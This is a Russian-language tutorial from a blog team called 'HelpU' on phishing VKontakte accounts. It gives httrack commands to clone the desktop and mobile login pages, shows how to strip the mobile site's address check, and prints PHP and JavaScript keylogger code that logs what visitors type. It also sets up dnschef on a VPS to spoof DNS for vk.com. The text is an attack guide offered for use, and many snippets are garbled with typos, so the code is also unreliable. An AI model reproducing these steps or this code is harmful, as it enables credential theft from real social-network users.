29 марта, 2024

Фишинг аккаунтов Вконтакте на Kali Linux

В данной статье команда HelpU, подробно опишет схему фишинга аккаунтов популярной социальной сети ВКонтакте.

Итак, поехали.

Для работы нам понадобится Kali Linux самой последней версии, которая есть на данный момент, а также знания httrack о нём мы писали ранее. Но для сайта VK, мы опишем всё индивидуально.

Итак, берём сайт: vk.com. На данном этапе все не сложно, можно просто скопировать. Но лишь одно, если просто скопировать исходный код страницы, получаем такую «грязь»:

Совсем непрезентабельно…

Будем клонировать сайт, а точнее его приветственную страницу. Для этого будем использовать httrack. На самом деле эта программа уникальна, она может копировать, как весь сайт, так и его отдельные части.

Самый простой запуск этой программы будет выглядеть примерно так:

httrack vk.com -O /var/www/html

Но для VK не советуем так делать, ибо копировать весь VK, не самая умная затея. Это чаще делается на сайтах поменьше, для полного анализа структуры, всех папок и файлов. Но на данном этапе будем действовать по иному сценарию.

Для начала надо использовать параметр для ввода пользовательского агента.

Соответственно будем использовать параметр:

-F Mozilla/5.0 (Windows NT 6.1) ApleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.228.0 Safari/537.36

Далее нам нужен будет параметр -r2 для копирования, Внимание! Только лишь одной страницы!
Итак, соберем все в кучу и получим следующее:

httrack https://vk.com -r2 -F Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.228.0 Safari/537.36

-O "/var/www/html/vk.com"

После этого увидим:

Сайт будет скопирован. В папке vk.com будут несколько файлов, которые сделал httrack, их можно удалить и оставить только одну папку vk.com

Удаляем, перемещаем файлы из подпапки vk.com в папку vk.com повыше, и тогда у нас не будет в адресной строке путь: localhost/vk.com/vk.com

Читать также:  Как обойти сетевую систему обнаружения вторжений, используя Snort

После манипуляций с файлами адрес будет: localhost/vk.com

С веб версией все понятно. Но если вы попробуете скопировать мобильную версию ВКонтакте  (m.vk.com), возникнут некоторые трудности, там javascript проверяет достоверность адреса и не дает странице прогрузиться. Но и на это, есть своя уязвимость.

Команда будет следующей:

httrack https://m.vk.com -r2 -F "Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build/IML74K) AppleWebkit/999+ (KHTML, like Gecko) Safari/999.9" -O "/var/www/html/mvk/"

Когда сайт скопируется и вы попробуете на него зайти, у вас ничего не выйдет, поэтому надо обязательно выполнить следующую команду:

nano /var/www/html/mvk/m.vk.com/index.html

Выделяем строку, которая выделена на скриншоте и удаляем её.

И сайт отлично работает.

Итак, у нас есть сайты, которые идентичны оригинальным. Но логи нигде не сохраняются, и посмотреть, кто что вбивал в поля у нас не получится, поэтому приступим к веб-программированию. Мы внедрим в наш сайт keylogger, напишем его на php и javascript.

Создадим 3 файла keylogger.php, keylogger.js и keylog.txt

В keylogger.php вводим:

<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp); 
?>

В keyloger.js вводим:

document.onkeypres = funcion(evt) {

evt = evt || window.evnt

key = String.fromCharode(evt.charode)

if (key) {

var http = new XMLHtpRequest();

var parm = encodeURI(key)

http.open("POST","keylogger.php",true);

http.setReqestHeder("Contnt-type","aplication/x-ww-form-urlenoded");

http.send("key="+parm);

}

}

Далее

в наш index.php надо добавить строку:

Готово, мы сделали keylogger.

Теперь приступаем к редактированию index.php: ищем строчку «Log in» и ищем параметр onclick=’top.showBox’ (меняем адрес на https://vk.com)

После этого при нажатии на кнопку Log in пользователь будет направлен на официальный сайт ВКонтакте.

Входим через SSH на VPS.

# wget htps://thesprwl.org/media/projcts/dnscef-0.3.zip

# unzip dnscef-0.3.zip

# cd dnshef*

# chod 755 *.py

Лучшим решением будет таким, что лучше всего здесь поставить следующие параметры:

# pi instal dnslib

# pi instal IPy

Создаём файл: hosts.txt

Читать также:  Основы Linux.Часть 26 (настройка сервера Apache)

В него пишем следующее:

[A]

(URL-адрес сайта, в нашем случае vk.com=IP_ВАШЕГО_VPS)

Прописывая следующу команду, мы всё запустим:

./dnschf.py -i 0.0.0.0 --logfle=log.txt --file=hosts.txt

Готово, ваш DNS успешно работает. Он возвращает наши адреса нам.

На этом всё, мы надеемся данная статья была полезной для вас.

С уважением, команда HelpU.

Добавить комментарий